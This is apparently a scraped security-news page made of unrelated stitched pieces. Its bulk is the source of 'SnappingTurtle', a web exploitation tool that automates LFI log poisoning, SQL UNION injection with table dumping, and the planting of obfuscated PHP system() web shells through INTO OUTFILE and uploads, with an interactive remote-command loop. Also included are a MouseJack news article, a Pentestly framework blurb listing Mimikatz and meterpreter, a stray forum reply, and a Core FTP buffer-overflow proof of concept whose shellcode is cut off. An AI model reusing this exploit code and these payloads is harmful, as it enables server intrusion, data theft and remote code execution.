    def __init__(self, searchValue, reqTmpl, dot = ".", separator = "/", terminator = "", min = 0, max = 8):
        (self.searchValue) = searchValue
        (self.reqTmpl) = reqTmpl
        (self.dot) = dot
        (self.separator) = separator
        (self.terminator) = terminator
        (self.min) = min
        (self.max) = max
        (self.files) = (self.createPaths)()

    def createPaths(self):
        def var_func_0000001B(x):
            def var_func_00000031(y):
                return (x + [y])

            return (lambda var_0000001B:select(var_func_00000031, var_0000001B))((self.names))

        return (lambda var_0000001C:selectMany(var_func_0000001B, var_0000001C))((self.dirs))

    def seqs(self):
        return TraversalRange((self.files), (self.min), (self.max), (self.dot), (self.separator), (self.terminator))

    def scan(self):
        for x in (self.seqs)():
            r = (self.testSeq)(x)
            if (r != None):
                return r

    def testSeq(self, seq):
        values = {"lfi": seq}
        url = ((self.reqTmpl).getUrl)(values)
        (self.log)(("[?] %s" % url))
        data = ((self.reqTmpl).getPost)(values)
        if (data != None):
            (self.log)(("    " + str(data)))
        resp = ((urllib2.urlopen)(url, data).read)()
        t = url, data
        return ((t) if ((resp.__contains__)((self.searchValue))) else (None))


from random import shuffle, randint
class PhpShellEmitter():
    stages = [[], [], [], []]
    emitter = None
    prefix = None
    suffix = None
    padMin = 10
    padMax = 32
    junkChars = (lambda var_0000001D:select(chr, var_0000001D))((lambda var_0000001E:where(var_func_0000001C, var_0000001E))((lambda var_0000001F:where(var_func_0000001D, var_0000001F))(range(33, 127))))
    def __init__(self):
        (self.emitter) = PhpEmitter()

    def stageDecl(self, stage, value):
        id, assign = ((self.emitter).declStmt)(value)
        ((self.stages)[stage].append)(assign)
        return id

    def varRef(self, stage, name):
        return (self.stageDecl)(stage, ("$" + (self.stageDecl)((stage - 1), ((self.emitter).string)(name, False))))

    def emit(self, command = None, pad = False):
        ((self.emitter).chr) = (self.stageDecl)(0, ((self.emitter).string)("chr", False, False))
        system = (self.stageDecl)(1, ((self.emitter).string)("system", False))
        if (command == None):
            input = (self.varRef)(2, "_GET")
            systemCallStmt = ((self.emitter).callStmt)(system, ((self.emitter).arrayAccess)(input, ((self.emitter).string)("cmd", False)))
        else:
            cmdStr = ((self.emitter).string)(command, False)
            systemCallStmt = ((self.emitter).callStmt)(system, cmdStr)
        ((self.stages)[3].append)(systemCallStmt)
        (lambda var_00000020:iter(shuffle, var_00000020))((lambda var_00000021:skip(1, var_00000021))((self.stages)))
        php = ""
        x = ((self.emitter).doc)(addAll(flatten((self.stages))))
        return ((x) if (not pad) else ((self.pad)(x)))

    def emitJunk(self):
        def var_func_0000001E(x):
            return choice((self.junkChars))

        return addAll((lambda var_00000022:select(var_func_0000001E, var_00000022))(range(0, randint((self.padMin), (self.padMax)))))

    def pad(self, value):
        (self.prefix) = (self.emitJunk)()
        (self.suffix) = (self.emitJunk)()
        return (((self.prefix) + value) + (self.suffix))


from random import choice, randint
class PhpEmitter():
    varNames = []
    chr = "chr"
    min = -2147483648
    max = 2147483647
    def doc(self, body):
        return ("<?php %s ?>" % body)

    def stmt(self, exp):
        return (exp + ";")

    def declStmt(self, value):
        n = (self.nextVar)()
        return n, (self.assignStmt)(n, value)

    def assignStmt(self, var, value):
        return (self.stmt)(("{}={}".format)(var, value))

    def arrayAccess(self, array, dim):
        return ("{}[{}]".format)(array, dim)

    def callStmt(self, target, args):
        return (self.stmt)((lambda var_00000023:(self.call)(target, var_00000023))(args))

    def call(self, target, args):
        return ("{}({})".format)(target, args)

    def string(self, string, allowPassthru = True, allowChars = True):
        funcs = [(self.splitString)]
        if allowChars:
            (funcs.append)((self.chars))
        return choice(funcs)(string)

    def echo(self, value):
        return (self.stmt)(("echo %s" % value))

    def splitString(self, string):
        l = len(string)
        if (l < 2):
            return (self.string)(string)
        i = randint(1, (l - 1))
        lhs = (self.string)(string[0:i])
        rhs = (self.string)(string[i:l])
        return ((lhs + ".") + rhs)

    def chars(self, str):
        return (lambda var_00000024:join(".", var_00000024))((lambda var_00000025:select((self.char), var_00000025))(str))

    def char(self, char):
        c = ord(char)
        n = choice([c, (self.widenByte)(c)])
        return ("{}({})".format)((self.chr), (self.number)(n))

    def number(self, number):
        return choice([(self.emit), (self.addition), (self.subtraction)])(number)

    def addition(self, number):
        def var_func_0000001F(x, y):
            return (x - y)

        return (self.binOp)(number, "+", var_func_0000001F)

    def subtraction(self, number):
        def var_func_00000020(x, y):
            return (x + y)

        return (self.binOp)(number, "-", var_func_00000020)

    def binOp(self, number, op, func):
        while True:
            x = (self.nextInt)()
            lhs = func(number, x)
            if ((self.validNum)(x) and (self.validNum)(lhs)):
                break
        rhs = (self.number)(x)
        fmt = (("({}{} {})") if ((op == str(rhs)[:1])) else ("({}{}{})"))
        return (fmt.format)(lhs, op, rhs)

    def emit(self, value):
        return value

    def nextInt(self):
        def var_func_00000021(x):
            return randint(((self.min) >> x), ((self.max) >> x))

        return choice((lambda var_00000026:select(var_func_00000021, var_00000026))([0, 8, 16, 32]))

    def nextVar(self):
        l = randint(1, 1)
        def var_func_00000022(x):
            return (self.getRandChar)()

        while True:
            v = ("$" + addAll((lambda var_00000027:select(var_func_00000022, var_00000027))(range(0, l))))
            if not ((self.varNames).__contains__)(v):
                ((self.varNames).append)(v)
                return v

    def quote(self, string):
        return ("\"%s\"" % (self.escape)(string))

    def getRandChar(self):
        return choice((self.getAllChars)())

    def getAllChars(self):
        return (((self.getChars)("a") + (self.getChars)("A")) + "_")

    def getChars(self, start):
        def var_func_00000023(x):
            return chr((ord(start) + x))

        return addAll((lambda var_00000028:select(var_func_00000023, var_00000028))(range(0, 26)))

    def escape(self, string):
        return ((string.replace)("\\", "\\\\").replace)("\"", "\\\"")

    def widenByte(self, number):
        mask = ((self.max) & ~255)
        while True:
            x = (((self.nextInt)() & mask) | number)
            if (self.validNum)(x):
                return x

    def validNum(self, number):
        return (((self.min) <= number) and (number <= (self.max)))


from urlparse import urlparse
class LogInjector(ExploitComponent):
    repo = JsonRepository("logShells.json")
    def __init__(self, reqTmpl, dot = ".", separator = "/", terminator = ""):
        (self.reqTmpl) = reqTmpl
        (self.dot) = dot
        (self.separator) = separator
        (self.terminator) = terminator
        (self.probe) = TraversalProbe("blank command", reqTmpl, dot, separator, terminator)
        (self.emitter) = PhpShellEmitter()
        (self.url) = (reqTmpl.url)

    def findShell(self):
        (self.log)("[i] Searching for shell")
        s = ((self.probe).scan)()
        if (s != None):
            (self.log)("[+] Shell found")
            if self.url in self.repo.repo:
                tags = ((self.repo).repo)[(self.url)]
                ((self.emitter).prefix) = tags[0]
                ((self.emitter).suffix) = tags[1]
            else:
                (self.log)("[-] Error: could not find shell prefix/suffix")
        else:
            (self.log)("[-] Shell not found")
        return s

    def sendShell(self):
        (self.log)("[i] Injecting shell")
        shell = ((self.emitter).emit)(pad = True)
        u = ((((self.reqTmpl).getUrl)({"lfi": shell})) if (((self.url).__contains__)("$lfi")) else ((((self.url) + "?") + shell)))
        ((self.repo).add)((self.url), [((self.emitter).prefix), ((self.emitter).suffix)])
        (self.log)(("    Url: " + u))
        (urllib2.urlopen)(u)

    def inject(self):
        shell = (self.findShell)()
        if (shell == None):
            (self.sendShell)()
            shell = (self.findShell)()
        return shell


import urllib
class LfiShell(ExploitComponent):
    shellInfo = None
    def __init__(self, reqTmpl, dot = ".", separator = "/", terminator = ""):
        (self.injector) = LogInjector(reqTmpl, dot, separator, terminator)

    def create(self):
        i = ((self.injector).inject)()
        if (i == None):
            (self.log)("[-] Could not exploit LFI")
            return False
        (self.shellInfo) = i
        return True

    def run(self, cmd):
        if ((self.shellInfo) == None):
            (self.log)("[!] No known shell")
            if not (self.create)():
                return None
            quit()
        u = (self.createCmdUrl)(cmd)
        (self.log)(("[?] %s" % u))
        _, d = (self.shellInfo)
        postData = d
        if (postData != None):
            (self.log)(("    " + str(postData)))
        resp = (self.parseResp)(((urllib2.urlopen)(u, postData).read)())
        return resp

    def parseResp(self, resp):
        def fan(v):
            def var_func_00000024(x):
                return [x, (x.upper)(), (x.lower)()]

            return distinct((lambda var_00000029:selectMany(var_func_00000024, var_00000029))([v, ((v.replace)("\\", "\\\\").replace)("\"", "\\\"")]))

        def split(v, t):
            for tag in fan(t):
                if (len(v) != 2):
                    v = (v[0].split)(tag)
                else:
                    break
            return v

        e = ((self.injector).emitter)
        if ((e.prefix) == None):
            return resp
        p = split([resp], (e.prefix))
        if (len(p) < 2):
            return resp
        return split([p[1]], (e.suffix))[0]

    def createCmdUrl(self, cmd):
        u, _ = (self.shellInfo)
        d = (urllib.urlencode)({"cmd": cmd})
        x = (("&") if ((u.__contains__)("?")) else ("?"))
        return ((u + x) + d)


class SqlEmitter():
    alpha = (CharRange.alpha)()
    def getChars(self):
        def var_func_00000025(___p_op_5):
            return (___p_op_5 != (self.quote)())

        return (lambda var_0000002A:select(chr, var_0000002A))((lambda var_0000002B:where(var_func_00000025, var_0000002B))(range(32, 128)))

    def tup(self, vals):
        def var_func_00000026(x, y):
            return (((x + ",") + (self.space)()) + y)

        return (lambda var_0000002C:aggr(var_func_00000026, var_0000002C))(vals)

    def words(self, words):
        def var_func_00000027(x, y):
            return ((x + (self.space)()) + y)

        return (lambda var_0000002D:aggr(var_func_00000027, var_0000002D))(words)

    def space(self):
        return " "

    def quote(self):
        return "'"

    def junkCharRange(self):
        def var_func_00000028(x):
            return choice((self.alpha))

        return (lambda var_0000002E:join("", var_0000002E))((lambda var_0000002F:select(var_func_00000028, var_0000002F))((lambda var_00000030:range(0, var_00000030))(randint(8, 32))))

    def junkString(self):
        return ("{1}{0}{1}".format)((self.junkCharRange)(), (self.quote)())

    def unionAll(self, cols):
        return (self.words)(["UNION", "SELECT", "ALL", (self.tup)(cols)])

    def comment(self):
        return "#"


import re
class SqlUnionInjector(ExploitComponent):
    def __init__(self, options, columns, dump_column, target_columns, target_table, delimiter = "'", delim = "'", row_start = "--start--", row_end = "--end--", where = None, terminator = "#"):
        (self.options) = options
        (self.columns) = columns
        (self.dump_column) = dump_column
        (self.target_columns) = target_columns
        (self.target_table) = target_table
        (self.delimiter) = delimiter
        (self.delim) = delim
        (self.row_start) = row_start
        (self.row_end) = row_end
        (self.where) = where
        (self.terminator) = terminator
        (self.host) = options["HOST"]
        (self.port) = options["PORT"]
        (self.dump) = ("Dump {}".format)(target_table)
        (self.shell) = None
        (self.payload) = None
        options["PAYLOAD"] = dict(options = [(self.dump), (self.shell)], selected = (self.dump))

    def set_payload(self, payload):
        def var_func_00000029():
            (self.payload) = payload

        return var_func_00000029

    def is_dump(self):
        return ((self.payload) == (self.dump))

    def str(self):
        s = ""
        if (self.delimiter):
            s += (self.delimiter)
        s += "UNION SELECT "
        if (self.delim):
            empty = ((self.delim) * 2)
            delim = (self.delim)
        else:
            empty = "0"
            delim = "'"
        if (self.is_dump)():
            s += (self.union)(empty, delim)
            if ((self.where) != None):
                s += (" " + (self.where))
        else:
            s += (self.shell)(empty, delim)
        s += (self.terminator)
        return s

    def union(self, empty, delim):
        s = ((empty + ",") * (self.dump_column))
        s += ("CONCAT_WS({0}stdelim{0},{0}{1}{0},".format)(delim, (self.row_start))
        def var_func_0000002A(x):
            return ("IFNULL(%s,'')" % x)

        s += (",".join)((lambda var_00000031:select(var_func_0000002A, var_00000031))((self.target_columns)))
        s += (",{0}{1}{0})".format)(delim, (self.row_end))
        s += (("," + empty) * (((self.columns) - (self.dump_column)) - 1))
        s += (" FROM {}".format)((self.target_table))
        return s

    def shell(self, empty, delim):
        shell_delim = (("\"") if ((delim == "'")) else ("'"))
        shell = ("{0}<?php system($_GET[{1}cmd{1}]); ?>{0}".format)(delim, shell_delim)
        col_seq = (shell + (("," + empty) * ((self.columns) - 1)))
        directory = "htdocs/"
        traverse = ("../" * 2)
        shell_file = "shell.php"
        s = ("{0} FROM dual INTO OUTFILE {1}{2}{3}{4}{1}{5}".format)(col_seq, delim, traverse, directory, shell_file, (self.terminator))
        return s

    def finalize(self, resp):
        def var_func_0000002B(___p_op_6):
            return (___p_op_6.split("stdelim"))

        if (self.is_dump)():
            pattern = ("{}stdelim(.*?)stdelim{}".format)((self.row_start), (self.row_end))
            matches = (re.findall)(pattern, resp)
            return (lambda var_00000032:select(var_func_0000002B, var_00000032))(matches)
        else:
            u = ("http://{}:{}/shell.php".format)((self.host), (self.port))
            s = ("GET {}\r\n".format)(u)
            code = ((urllib2.urlopen)(u).getcode)()
            if (code == 200):
                s += ("Shell found at {}".format)(u)
            else:
                s += "Shell not found, exploit failed"
            return s


import sys
from ast import literal_eval
class CliArgs():
    Mode = None
    ModeOption = None
    ModeOption2 = None
    Get = None
    Post = None
    File = None


class ParserState():
    Class = 0
    Url = 1
    Option = 2
    OptionValue = 3
    OptionValue2 = 4
    ModeOption = 5
    ModeOption2 = 6
    Filename = 7
    FileData = 8


class ArgOption():
    GetPair = "-g"
    PostPair = "-p"
    Get = "--g"
    Post = "--p"
    File = "-f"


class ClassOption():
    Lfi = "lfi"
    Sqli = "sqli"
    Xss = "xss"
    Shell = "shell"
    Upload = "upload"


class SqliOption():
    List = "list"
    Table = "table"


def parseArgs():
    i = 0
    key = None
    key2 = None
    key3 = None
    state = (ParserState.Class)
    obj = CliArgs()
    args = (lambda var_00000033:skip(1, var_00000033))((sys.argv))
    for x in args:
        _cwSwitchValue_0000 = state
        if (_cwSwitchValue_0000 == (ParserState.Class)):
            (obj.Mode) = x
            _cwSwitchValue_0001 = x
            if ((_cwSwitchValue_0001 == (ClassOption.Sqli)) or (_cwSwitchValue_0001 == (ClassOption.Xss))):
                state = (ParserState.ModeOption)
            else:
                state = (ParserState.Url)
        else:
            if (_cwSwitchValue_0000 == (ParserState.ModeOption)):
                (obj.ModeOption) = x
                if (((obj.Mode) == (ClassOption.Sqli)) and ((obj.ModeOption) == (SqliOption.Table))):
                    state = (ParserState.ModeOption2)
                else:
                    state = (ParserState.Url)
            else:
                if (_cwSwitchValue_0000 == (ParserState.ModeOption2)):
                    (obj.ModeOption2) = x
                    state = (ParserState.Url)
                else:
                    if (_cwSwitchValue_0000 == (ParserState.Url)):
                        (obj.Url) = x
                        state = (ParserState.Option)
                    else:
                        if (_cwSwitchValue_0000 == (ParserState.Option)):
                            key = x
                            state = (ParserState.OptionValue)
                        else:
                            if (_cwSwitchValue_0000 == (ParserState.OptionValue)):
                                _cwSwitchValue_0002 = key
                                if (_cwSwitchValue_0002 == (ArgOption.Get)):
                                    (obj.Get) = literal_eval(x)
                                    state = (ParserState.Option)
                                else:
                                    if (_cwSwitchValue_0002 == (ArgOption.Post)):
                                        (obj.Post) = literal_eval(x)
                                        state = (ParserState.Option)
                                    else:
                                        if ((_cwSwitchValue_0002 == (ArgOption.GetPair)) or (_cwSwitchValue_0002 == (ArgOption.PostPair))):
                                            key2 = x
                                            state = (ParserState.OptionValue2)
                                        else:
                                            if (_cwSwitchValue_0002 == (ArgOption.File)):
                                                key2 = x
                                                state = (ParserState.Filename)
                            else:
                                if (_cwSwitchValue_0000 == (ParserState.OptionValue2)):
                                    d = None
                                    _cwSwitchValue_0003 = key
                                    if (_cwSwitchValue_0003 == (ArgOption.GetPair)):
                                        if ((obj.Get) == None):
                                            (obj.Get) = dict()
                                        d = (obj.Get)
                                    else:
                                        if (_cwSwitchValue_0003 == (ArgOption.PostPair)):
                                            if ((obj.Post) == None):
                                                (obj.Post) = dict()
                                            d = (obj.Post)
                                    d[key2] = x
                                    state = (ParserState.Option)
                                else:
                                    if (_cwSwitchValue_0000 == (ParserState.Filename)):
                                        key3 = x
                                        state = (ParserState.FileData)
                                    else:
                                        if (_cwSwitchValue_0000 == (ParserState.FileData)):
                                            if ((obj.File) == None):
                                                (obj.File) = []
                                            ((obj.File).append)(HttpFile(key2, key3, x))
                                            state = (ParserState.Option)
                                        else:
                                            print(("Error parsing argument: %s" % x))
                                            quit()
        i = (i + 1)
    return obj

hasArgs = var_func_0000002C(len((sys.argv)))
args = parseArgs()
import json
class ShellCommand():
    Quit = "quit"


def shellLoop(shell):
    while True:
        cmd = raw_input("st>")
        _cwSwitchValue_0004 = cmd
        if (_cwSwitchValue_0004 == (ShellCommand.Quit)):
            print("Exiting")
            quit()
        else:
            print((shell.run)(cmd))

def listTables(tmpl):
    probe = SqlUnionProbe(tmpl)
    di = (probe.listSchemas)()
    if (di == None):
        print("[X] List tables failed\r\n")
        return None
    keys = (di.keys)()
    print(("[+] %s databases found\r\n" % len(keys)))
    for key in keys:
        print(("    " + key))
        for table in di[key]:
            print(("      " + table))
        print("")

def printTable(columns, rows):
    def var_func_0000002D(x):
        return ""

    rows = (([columns] + [(lambda var_00000034:select(var_func_0000002D, var_00000034))(columns)]) + rows)
    def var_func_0000002E(x):
        return (sorted(x, reverse = True)[0] + 1)

    def var_func_0000002F(x):
        def var_func_00000032(y):
            return ((len(y[x])) if ((x < len(y))) else (0))

        return (lambda var_00000035:select(var_func_00000032, var_00000035))(rows)

    colLens = (lambda var_00000036:select(var_func_0000002E, var_00000036))((lambda var_00000037:select(var_func_0000002F, var_00000037))(range(0, len(columns))))
    for row in rows:
        i = 0
        for col in row:
            maxLen = colLens[i]
            pad = (maxLen - len(col))
            ((sys.stdout).write)((col + (" " * (pad + 1))))
            i = (i + 1)
        ((sys.stdout).write)("\r\n")
    ((sys.stdout).write)("\r\n")

print(("SnappingTurtle Web Exploitation Tool 0.1." + "0324.1445"))
print("http://autosectools.com/SnappingTurtle\r\n")
if hasArgs:
    shell = None
    tmpl = HttpRequestTemplate((args.Url), (args.Get), (args.Post), (args.File))
    _cwSwitchValue_0005 = (args.Mode)
    if (_cwSwitchValue_0005 == (ClassOption.Lfi)):
        print("[i] Exploiting local file inclusion")
        shell = LfiShell(tmpl)
        if not (shell.create)():
            print("[X] Failed to create shell, exiting\r\n")
            quit()
    else:
        if (_cwSwitchValue_0005 == (ClassOption.Sqli)):
            print("[i] Exploiting SQL injection")
            _cwSwitchValue_0006 = (args.ModeOption)
            if (_cwSwitchValue_0006 == (SqliOption.List)):
                print("[?] Listing databases and tables")
                listTables(tmpl)
            else:
                if (_cwSwitchValue_0006 == (SqliOption.Table)):
                    p = ((args.ModeOption2).split)(".")
                    schema = p[0]
                    table = p[1]
                    print(("[?] Dumping table '{}' of database '{}'".format)(table, schema))
                    probe = SqlUnionProbe(tmpl)
                    columns = (probe.listColumns)(schema, table)
                    if (columns == None):
                        print("[X] Could not enumerate columns\r\n")
                        quit()
                    rows = (probe.dumpTable)(table, columns = columns)
                    if (rows != None):
                        print("\r\n[+] Table dumped:\r\n")
                        printTable(columns, rows)
                    else:
                        print("[X] Could not dump table\r\n")
                        quit()
                else:
                    print("[X] Invalid SQL injection option\r\n")
                    quit()
            quit()
        else:
            if (_cwSwitchValue_0005 == (ClassOption.Xss)):
                print("[i] Starting XSS server\r\n")
                ip = (args.ModeOption)
                server = ExploitServer(ip)
                xss = (server.createExploit)(tmpl)
                print(("[+] XSS URL:\r\n\r\n    %s\r\n" % xss))
                (server.serveForever)()
            else:
                if (_cwSwitchValue_0005 == (ClassOption.Upload)):
                    php = (PhpShellEmitter().emit)()
                    values = {"php": php}
                    file = (tmpl.getFile)(values)
                    if ((file == None) or (len(file) == 0)):
                        print("[X] No file specified to upload, exiting.")
                        quit()
                    tup = (lambda var_00000038:join(", ", var_00000038))((lambda var_00000039:select(var_func_00000030, var_00000039))(file))
                    print(("[i] Uploading: %s\r\n" % tup))
                    resp = (Http.request)((tmpl.getUrl)(values), (tmpl.getPost)(values), file)
                    print(("\r\n[+] Response:\r\n\r\n%s\r\n" % resp))
                    quit()
                else:
                    if (_cwSwitchValue_0005 == (ClassOption.Shell)):
                        print(("[i] Connecting to shell: %s" % (args.Url)))
                        shell = (Shell.open)((args.Url))
                        if (shell == None):
                            print("[X] Failed to open shell, exiting.")
                            quit()
                    else:
                        print(("[X] Invalid strategy: %s\r\n" % (args.Mode)))
                        quit()
    shellLoop(shell)
else:
    print("python st.py [exploitation strategy] [url] [inputs]\r\n")
    print("# Exploitation Strategies\r\n")
    print("  lfi                Local file inclusion. Injection is performed using the $lfi token.")
    print("")
    print("  sqli {options}     SQL injection. Injection is performed using the $sqli token.")
    print("")
    print("    If used, one of two options must be specified:")
    print("")
    print("    list             Dumps a list of databases and tables.")
    print("    table {name}     Dumps a database table.")
    print("")
    print("  xss {server ip}    Cross-site scripting. Injection is performed using the $xss token.")
    print("")
    print("    If used, a target accessible server IP must be specified for listening.")
    print("")
    print("  upload             Arbitrary upload. Write data to the server using the -f option.")
    print("")
    print("    If used, at least one file must be specified using the -f option.")
    print("    Built-in shells can be injected using the $php token.")
    print("")
    print("  shell {shell url}  Connects to a previously created shell.")
    print("")
    print("# Url\r\n")
    print("  The url to exploit. Can be injected into using tokens.\r\n")
    print("# Inputs\r\n")
    print("  -g {GET name} {GET value}          GET data in key/value format.")
    print("  -p {POST name} {POST value}        POST data in key/value format.")
    print("  --g {GET data}                     GET data in Python map format.")
    print("  --p {POST data}                    POST data in Python map format.")
    print("  -f {name} {filename} {file data}   POST data as a file.")
    print("")
    print("# Examples\r\n")
    print("  python st.py lfi http://localhost/lfiTest.php?theme=$lfi\r\n")
    print("  python st.py lfi http://localhost/lfiTest.php -g theme $lfi\r\n")
    print("  python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00\r\n")
    print("  python st.py lfi http://localhost/postTest.php --p \"{'theme':'$lfi'}\"\r\n")
    print("  python st.py sqli list http://localhost/sqliTest.php -g email $sqli\r\n")
    print("  python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli\r\n")
    print("  python st.py xss 10.0.0.122 http://10.0.0.145/xss.php -g search $xss\r\n")
    print("  python st.py upload http://10.0.0.145/upload.php -f file shell.php $php\r\n")
    print("  python st.py shell http://10.0.0.145/shell.php\r\n")

Download SnappingTurtle_0.1.0324.1445.zip (16.3 KB)

[How to Hack a Computer from 100 Meters by Hijacking its Wireless Mouse or Keyboard]

No matter how secure you think your computer might be, something malicious can always happen. As a Computer is an open book with right tools and talent.

The same is proved by a group of security researchers by hacking into a computer with no internet, and no Bluetooth devices.

Yes, it is possible for attackers to Hack Your Computer through non-Bluetooth devices such as your wireless mouse and keyboard and install Malware or Rootkit onto your machine.

That innocent-looking tiny dongle plugged into your USB port to transmit data between your wireless mouse, and the computer is not as innocent as it pretends to be.

 

 

What's the Vulnerability?

 

Security researchers from the Internet of things security firm Bastille have warned that wireless keyboards and mice from seven popular manufacturers including Logitech, Dell, Microsoft, HP and Lenovo are…

…vulnerable to so-called MouseJack attacks, leaving Billions of computers vulnerable to hackers.

The flaw actually resides in the way these wireless mice and their corresponding radio receivers handle encryption.

The connection between the tiny dongle and the mouse is not encrypted; thus, the dongle would accept any seemingly valid command.

 

How to Hijack Wireless Mouse and Hack Computer?

 

Wireless mice and keyboards communicate via radio frequency with a USB dongle inserted into the PC. The dongle then sends packets to the PC, so it follows the mouse clicks or keyboard types.

While most wireless keyboard manufacturers encrypt traffic between the keyboard and the dongle in an effort to prevent spoofing or hijacking of the device.

However, the mice tested by Bastille did not encrypt their communications to the dongle, allowing an attacker to spoof a mouse and install malware on victim's PC.

With the use of around $15-$30 long-range radio dongle and a few lines of code, the attack could allow a malicious hacker within 100 meters range of your computer to intercept the radio signal between the dongle plugged into your computer and your mouse.

 

 

The hacker can, therefore, send packets that generate keystrokes instead of mouse clicks, allowing the hacker to direct your computer to a malicious server or website in mere seconds.

During their tests, researchers were able to generate 1000 words/minute over the wireless connection and install a malicious Rootkit in about 10 seconds. They tested several mice from Logitech, Lenovo, and Dell that operate over 2.4GHz wireless communications.

 

Video Demonstration of MouseJack Attack

 

Who are Affected?

 

The following is the list of the wireless keyboard and mouse manufacturers whose non-Bluetooth wireless devices are affected by the MouseJack flaws:

 

•     Logitech
•     Dell
•     HP
•     Lenovo
•     Microsoft
•     Gigabyte
•     AmazonBasics

 

Billions of PC users with wireless dongles from any of the above manufacturers are at risk of MouseJack flaw. Even Apple Macintosh and Linux machine users also could be vulnerable to the attack.

These mice are separate from Bluetooth mice that are not affected by this security issue.

 

Many Wireless Devices will Never Receive any Patch

 

The researchers have already reported the security issue to all the seven manufacturers, but as of today, only Logitech has released a firmware update that blocks MouseJack attacks.

However, there are a wide number of cheaper mice that don't have updatable firmware, due to which all of them will remain vulnerable forever, which could be a major issue in business environments where peripherals are often utilized for several years before being replaced.

Although Lenovo, HP, Amazon, and Gigabyte did not comment, a Dell spokesperson advised the users of the KM714 keyboard and mouse combo to get the Logitech firmware patch via Dell Tech Support and the KM632 Combo users to replace their devices.

Here's the list of affected devices, so if you are using one of them, it might be time to check for updates, and if not available, replace your existing peripheral.

For more in-depth knowledge, you can refer this white paper explaining technical details.

 

Via

 

[Powershell Penetration Testing Framework: Pentestly]

Python and Powershell internal penetration testing framework

 

 

Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.

 
Current features

•     Import NMAP XML
•     Test SMB authentication using:
•         individual credentials
•         file containing credentials
•         null credentials
•         NTLM hash
•     Test local administrator privileges for successful SMB authentication
•     Identify readable SMB shares for valid credentials
•     Store Domain/Enterprise Admin account names
•     Determine location of running Domain Admin processes
•     Determine systems of logged in Domain Admins
•     Execute Powershell commands in memory and exfil results
•     Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
•     Receive a command shell (Powercat)
•     Receive a meterpreter session (Invoke-Shellcode.ps1)

 

Shoulders of Giants

Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

•     recon-ng – Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
•     wmiexec.py – Allows us to execute Powershell commands quickly and easily via WMI
•     smbmap.py – Useful utility for enumerating SMB shares
•     Invoke-Mimikatz.ps1 – Implementation of Mimikatz in Powershell
•     powercat.ps1 – Netcat-esque functionality in Powershell
•     Invoke-Shellcode.ps1 – Deploy Meterpreter in Powershell

 
Install

git clone https://github.com/praetorian-inc/pentestly.git

	./install.sh

	./pentestly

 

Source: https://n0where.net/powershell-penetration-testing-framework-pentestly/

 

[//solved]

//solved

[cumpar usd btc]

On 2/21/2016 at 9:56 PM, gafi said:

Iti recomand cu caldura aparatele QIWI, comisioanele la bitcoin sunt mici, mai ales la 7USD.

nu sunt terminale QIWI unde ma aflu.

 

 

 

[Core FTP Server 1.2 Buffer Overflow]

Core FTP Server version 1.2 buffer overflow proof of concept exploit.

 

#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
#   Facebook : https://www.facebook.com/B.INSECT00
#   GitHub : binsect00
#   Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link: 
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86 
# CVE : N/A
   
'''
[+] Type : Buffer overflow
[+] Detail : 
[-]  The vulnerability has the most typical Buffer overflow vulnerabilities. 
[-]  Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More] 
[-]  'Log filename(include path)' field is no limit to the length and does not check the length
[-]  Insert string "A"*1500 and press Ok, OK
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???
'''
import struct
 
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b)  # USER32!gSharedInfo+0x181fb:
                                    # 7795163b ffe4            jmp     esp
nop = "\x90" * 10
 
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
